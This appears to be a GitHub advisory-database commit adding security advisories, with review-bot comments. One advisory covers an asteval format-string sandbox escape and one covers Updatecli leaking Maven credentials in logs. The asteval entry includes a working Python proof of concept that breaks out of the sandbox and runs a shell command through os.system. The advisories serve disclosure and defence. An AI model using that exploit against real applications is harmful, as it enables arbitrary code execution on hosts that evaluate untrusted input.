GHSA-3wwr-3g9f-9gc7
GHSA-v34r-vj4r-38j6
GHSA-vqf5-2xx6-9wfm
advisory-database[bot] 2025-01-24 18:46:23 +00:00
Parent ba66d77a9c
Commit e1a28f92dd
3 changed files: 250 additions and 0 deletions


@ -0,0 +1,77 @@
{
"schema_version": "1.4.0",
"id": "GHSA-3wwr-3g9f-9gc7",
"modified": "2025-01-24T18:45:30Z",
"published": "2025-01-24T18:45:30Z",
"aliases": [
"CVE-2025-24359"
],
"summary": "ASTEVAL Allows Maliciously Crafted Format Strings Lead to Sandbox Escape",
"details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')\n \"formatting used in f-strings\"\n val = self.run(node.value)\n fstring_converters = {115: str, 114: repr, 97: ascii}\n if node.conversion in fstring_converters:\n val = fstring_converters[node.conversion](val)\n fmt = '{__fstring__}'\n if node.format_spec is not None:\n fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'\n return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. 
The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n# ga\n \ndef pwn():\n try:\n f\"{dict.mro()[1]:'\\\\x7B__fstring__.__getattribute__.s\\\\x7D'}\"\n except Exception as ga:\n ga = ga.obj\n sub = ga(dict.mro()[1],\"__subclasses__\")()\n importer = None\n for i in sub:\n if \"BuiltinImporter\" in str(i):\n importer = i.load_module\n break\n os = importer(\"os\")\n os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n \npwn()\n\"\"\"\naeval(code)\n\n```",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "asteval"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.6"
}
]
}
],
"database_specific": {
"last_known_affected_version_range": "<= 1.0.5"
}
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/lmfit/asteval"
},
{
"type": "WEB",
"url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
},
{
"type": "WEB",
"url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
}
],
"database_specific": {
"cwe_ids": [
"CWE-134",
"CWE-749"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2025-01-24T18:45:30Z",
"nvd_published_at": "2025-01-24T17:15:16Z"
}
}
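Review bot: the `summary` string is ungrammatical ("ASTEVAL Allows Maliciously Crafted Format Strings Lead to Sandbox Escape"); consider "ASTEVAL allows maliciously crafted format strings to escape the sandbox" so the title reads as a sentence. Minor consistency point: the lucumr article is cited with a trailing slash in `details` (`.../careful-with-str-format/`) but without it in `references` (`.../careful-with-str-format`); aligning the two avoids duplicate-URL handling downstream.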


@ -0,0 +1,69 @@
{
"schema_version": "1.4.0",
"id": "GHSA-v34r-vj4r-38j6",
"modified": "2025-01-24T18:45:21Z",
"published": "2025-01-24T18:45:20Z",
"aliases": [
"CVE-2025-24355"
],
"summary": "Updatecli exposes Maven credentials in console output",
"details": "### Summary\n\nPrivate maven repository credentials leaked in application logs in case of unsuccessful retrieval operation.\n\n### Details\n\nDuring the execution of an updatecli pipeline which contains a `maven` source configured with basic auth credentials, the credentials are being leaked in the application execution logs in case of failure.\n\nCredentials are properly sanitized when the operation is successful but not when for whatever reason there is a failure in the maven repository .e.g. wrong coordinates provided, not existing artifact or version.\n\n### PoC\n\nThe [documentation](https://www.updatecli.io/docs/plugins/resource/maven/) currently state to provide user credentials as basic auth inside the `repository` field. e.g.\n\n```\nsources:\n default:\n kind: maven\n spec:\n repository: \"{{ requiredEnv \"MAVEN_USERNAME\" }}:{{ requiredEnv \"MAVEN_PASS\" }}@repo.example.org/releases\"\n groupid: \"org.example.company\"\n artifactid: \"my-artifact\"\n versionFilter:\n kind: regex\n pattern: \"^23(\\.[0-9]+){1,2}$\"\n```\n\nLogs are sanitized properly in case of a successful operation:\n\n```\nsource: source#default\n-----------------------------------------------------------\nSearching for version matching pattern \"^23(\\\\.[0-9]+){1,2}$\"\n✔ Latest version is 23.4.0 on the Maven repository at https://repo.example.org/releases/org/example/company/my-artifact/maven-metadata.xml\n```\n\nbut leaks credentials in case the GAV coordinates are wrong (misspelled package name or missing):\n\n```\nsource: source#default\n-----------------------------------------------------------\nERROR: ✗ getting latest version: URL \"https://REDACTED:REDACTED@repo.example.org/releases/org/example/company/wrong-artifact/maven-metadata.xml\" not found or in error\n```\n\n### Impact\n\nUser credentials/token used to authenticate against a private maven repository can be leaked in clear-text in console or CI logs.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/updatecli/updatecli"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "0.93.0"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/updatecli/updatecli/security/advisories/GHSA-v34r-vj4r-38j6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24355"
},
{
"type": "WEB",
"url": "https://github.com/updatecli/updatecli/commit/344b28091ffeca5ed32e8d0f9eda542842fcd3fa"
},
{
"type": "PACKAGE",
"url": "https://github.com/updatecli/updatecli"
},
{
"type": "WEB",
"url": "https://www.updatecli.io/docs/plugins/resource/maven"
}
],
"database_specific": {
"cwe_ids": [
"CWE-359"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2025-01-24T18:45:20Z",
"nvd_published_at": "2025-01-24T17:15:16Z"
}
}
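Review bot: `cwe_ids` carries only CWE-359 (Exposure of Private Personal Information to an Unauthorized Actor), but the `details` describe repository credentials being written to the application's execution logs on a failed retrieval, which CWE-532 (Insertion of Sensitive Information into Log File) classifies more precisely; consider adding it alongside or in place of CWE-359. Two wording fixes in `details`: "The documentation currently state" should be "states", and "not existing artifact or version" should be "non-existent artifact or version".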

File diff suppressed because one or more lines are too long